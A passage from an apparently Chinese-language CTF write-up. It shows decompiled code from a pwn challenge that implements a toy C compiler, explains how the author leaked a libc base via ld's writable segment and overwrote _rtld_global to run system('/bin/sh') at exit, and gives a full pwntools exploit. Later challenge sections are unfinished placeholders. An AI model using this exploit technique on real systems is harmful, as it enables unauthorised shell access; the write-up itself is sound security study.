                    printf("%d: close bracket expected\n", qword_206098);
                    exit(-1);
                }
                sub_B70();
                if ( v21 <= 2 ) {
                    if ( v21 <= 1 ) {
                        printf("%d: pointer type expected\n", qword_206098);
                        exit(-1);
                    }
                } else {
                    qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
                    qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
                    qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 8LL;
                    qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 27LL;
                }
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 25LL;
                qword_206088 = (char *)qword_206088 + 8;
                qword_206078 = v21 - 2;  // one pointer level stripped
                if ( v21 == 2 ) v16 = 10LL; else v16 = 9LL;
                *(_QWORD *)qword_206088 = v16;
            } else {
                // post-increment: increment in place, then undo the step so the
                // old value is what remains
                if ( *(_QWORD *)qword_206088 == 10LL ) {
                    *(_QWORD *)qword_206088 = 13LL;
                    qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 10LL;
                } else {
                    if ( *(_QWORD *)qword_206088 != 9LL ) {
                        printf("%d: bad lvalue in post-increment\n", qword_206098);
                        exit(-1);
                    }
                    *(_QWORD *)qword_206088 = 13LL;
                    qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 9LL;
                }
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
                qword_206088 = (char *)qword_206088 + 8;
                if ( qword_206078 <= 2 ) v11 = 1LL; else v11 = 8LL;
                *(_QWORD *)qword_206088 = v11;
                qword_206088 = (char *)qword_206088 + 8;
                if ( qword_206070 == 162 ) v12 = 25LL; else v12 = 26LL;
                *(_QWORD *)qword_206088 = v12;
                qword_206088 = (char *)qword_206088 + 8;
                if ( qword_206078 ) v13 = 11LL; else v13 = 12LL;
                *(_QWORD *)qword_206088 = v13;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
                qword_206088 = (char *)qword_206088 + 8;
                if ( qword_206078 <= 2 ) v14 = 1LL; else v14 = 8LL;
                *(_QWORD *)qword_206088 = v14;
                qword_206088 = (char *)qword_206088 + 8;
                if ( qword_206070 == 162 ) v15 = 26LL; else v15 = 25LL;  // inverse of the operation above
                *(_QWORD *)qword_206088 = v15;
                sub_B70();
            }
            break;
        }
    }
    return __readfsqword(0x28u) ^ v24;  // canary check
}
赛后了解到这是个 C 语言编译器,有一些限制,函数只能调用一次
函数和变量类型也只能用程序给的,程序的主要利用点我是通过 gdb 调试出来的
通过 gdb 断点可以发现,我们定义的变量都在 ld 的可写段上
由于有不同 ld 对于 libc 偏移不一样,但同一 ld 对于 libc 偏移都一样的特性
我们可以得到带有 libc 地址的变量,之后程序会调用 exit 退出,但 exit 的参数是不定的
所以我就想靠 _rtld_global 来进行提权,因为 one_gadget 成功的概率太小,所以我用的是 system("/bin/sh");
这题坑点就是在正常的 ld 上运行程序的话,指针和 libc 的偏移是 0x506XXX
但是远程环境对不上,是 0x529XXX 的偏移,以后做这类题可以考虑按页爆破了
这里还有一点是,假如我不在程序后面加上 exit(0);,那么使用 one_gadget 提权的可能性就微乎其微
而加上后只有第四个 one_gadget(0xf1147) 能正常使用
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * debug = 1 context(arch='amd64', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('182.92.73.10', 24573) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False) # gdb.attach(p, "b exit\nb *$rebase(0x44D6)" + "\nc") # gdb.attach(p, "b _dl_fini\nc") pd = ''' int *tmp; int *libcbase; int *addr_system; int *addr_bin_sh; int *addr__rtld_global_3848; int *addr__rtld_global_2312; void main(){ libcbase = (int)&tmp - 0x529010; addr_system = (int)libcbase + 0x45390; addr_bin_sh = (int)libcbase + 0x18cd57; addr__rtld_global_3848 = (int)libcbase + 0x5f0040 + 3848; addr__rtld_global_2312 = (int)libcbase + 0x5f0040 + 2312; *addr__rtld_global_3848 = addr_system; *addr__rtld_global_2312 = *addr_bin_sh; } ''' p.sendlineafter('ng...', pd) p.interactive()
Flag:
动态靶机
boom2(未完)
文件存于:https://quqi.gblhgk.com/s/911627/2n6ziVZeKwCdZXRn
貌似也是一道 vmpwn
Description:
nc 182.92.73.10 36642
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
main 函数如下:
test
exp 如下:
test
Flag:
动态靶机
faster0(未完)
盲 Pwn,听说是 AEG,等官方开放题目吧
Description:
nc 39.96.72.181 42732
Solution:
盲 Pwn
程序保护如下:
test
main 函数如下:
test
exp 如下:
test
Flag:
动态靶机